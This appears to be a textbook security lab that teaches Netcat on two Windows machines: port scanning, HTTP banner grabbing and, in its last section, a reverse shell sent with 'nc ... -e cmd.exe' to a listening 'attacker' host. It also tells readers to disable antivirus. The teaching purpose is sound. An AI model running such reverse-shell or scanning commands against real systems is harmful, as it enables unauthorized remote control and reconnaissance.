Task 8.7: Investigating Netcat
One of the interesting things about security tools is that everybody uses them. Security tools are used by security professionals but also by hackers. One of the first security assessment tools was Satan. While Satan helped secure networks, it could also be used by attackers to scan networks for vulnerabilities. Our next task uses a very similar tool, Netcat. Netcat can be a useful tool for establishing remote connections.
Scenario
The organization for which you work has become more concerned about security and would like you to demonstrate the need for better security controls. You have decided to use Netcat, the Swiss Army knife of security tools, to demonstrate how establishing remote connections are performed.
Scope of Task
Duration
This task should take about 15 minutes.
Setup
For this task, you will need two Windows computers, access to the Administrator account, and an Internet connection.
Caveat
Tools such as Netcat may be flagged by some antivirus tools as malicious. You should also practice caution when downloading unknown tools. You should always check out a tool on a closed test network before deploying live.
Procedure
In this task, you will learn how to use Netcat, a security-assessment tool.
Equipment Used
For this task, you must have:
- Two Windows computers
- Access to the Administrator account
- An Internet connection
Details
This task will run Netcat, a command-line security tool. It will be used to perform banner grabbing, to scan ports, and to open a remote connection.
Installing and Using Netcat
1. Once you have accessed your Windows computer and logged in as Administrator, open your browser and go to http://webscripts.softpedia.com/script/Networking-Tools/Netcat-27515.html.
This will take you to the download page of the Windows version of Netcat.
If you would like more details from the creator, you can find their site at http://netcat.sourceforge.net/.
2. Choose the Download link to start the download.
3. When the download finishes, place the tool into the path so that when you open a command prompt the program can be easily found.
If your virus scanner complains about running Netcat, you will need to disable it for the duration of this task.
4. Before starting the scanning process, take a moment to review some common Netcat switches. Start your Windows computer and open a command prompt by choosing Start ⇒ Run and entering cmd. Type nc –h from the command line to review Netcat options. The response will look similar to the following:
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
Port Scanning with Netcat
1. Netcat can be used as a simple port scanner; to do so, enter the following at the command line: nc -v -w 2 -z IP_address 21-110.
2. Replace IP_address with the IP address of the second Windows computer.
3. The previous command requests that Netcat try every connection between ports 21 and 110 at the targeted IP address. This would tell you the status of such ports as FTP, Telnet, DNS, and POP3.
4. These are the ports that attackers typically target. Notice the results obtained when we ran the tool:
C: emp>nc -v -w 2 -z 192.168.123.254 21-110
192.168.123.254: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.123.20] 21 (ftp) open
(UNKNOWN) [192.168.123.20] 53 (dns) open
(UNKNOWN) [192.168.123.20] 80 (http) open
5. What were the results? Were you able to identify any open ports? If so, you will want to investigate why these ports are open and if these services are actually needed.
Practicing the principle of “deny all” is one of the most important things a security professional can do.
Grabbing Banners with Netcat
1. Netcat is truly a tool of many functions. This part of the task will demonstrate how to use Netcat to grab banners.
2. Use Notepad to create a text file named header.txt with the following content:
HEAD / HTTP/1.0
<ENTER>
<ENTER>
3. Run Netcat as follows and enter the IP address of the second Windows system you have running: nc –v IP_address Port 80 < header.txt.
4. For this exercise, we ran the tool against 192.168.123.1 and the results are shown here:
Apache/2.0.48-dev (Unix)
Server at 192.168.123.1 Port 80</address>
Responses will vary depending on the version of the web server running or whether the banner has been altered. Some system administrators block the service identifier.
Using Netcat to Shovel a Shell
1. Many individuals wonder how attackers use remote systems to launch attacks. One of Netcat’s most interesting features is its ability to open a connection on a remote system. Make sure Netcat is loaded on both of your Windows computers.
The two Windows computers will be called Windows1 and Windows2. Windows1 will serve as the attacker and Windows2 will serve as the victim.
2. On Windows1, open a command prompt and enter the following command: nc –n –v –l –p 80.
This command will cause Netcat to listen on port 80 for a connection from Windows2.
3. On Windows2, open a command prompt and enter this command:
nc -n Windows1_IP_Address 80 -e "cmd.exe"
Be sure to replace Windows1_IP_Address with the IP address of Windows1.
4. Once you enter the command, return to Windows1 and observe the command prompt where Netcat is listening. If you have entered the commands successfully, you will see a standard Windows banner. Type IP config and confirm that the IP address is the address of Windows2.
5. At this point, you are running commands on Windows2. Had this been a real attack, this system would be in serious danger of being fully compromised.
To fully grasp the danger such tools possess, just consider that the attacker is now running their programs on your computer. For a good set of guidelines of safe security practices, review the “10 Immutable Laws of Security” at www.microsoft.com/technet/archive/community/columns/security/essays/10imlaws.mspx?mfr=true.
Criteria for Completion
You have completed this task when you have run Netcat to scan ports, perform banner grabbing, and open a remote shell. You should now see how some tools can be used by both security professionals and attackers.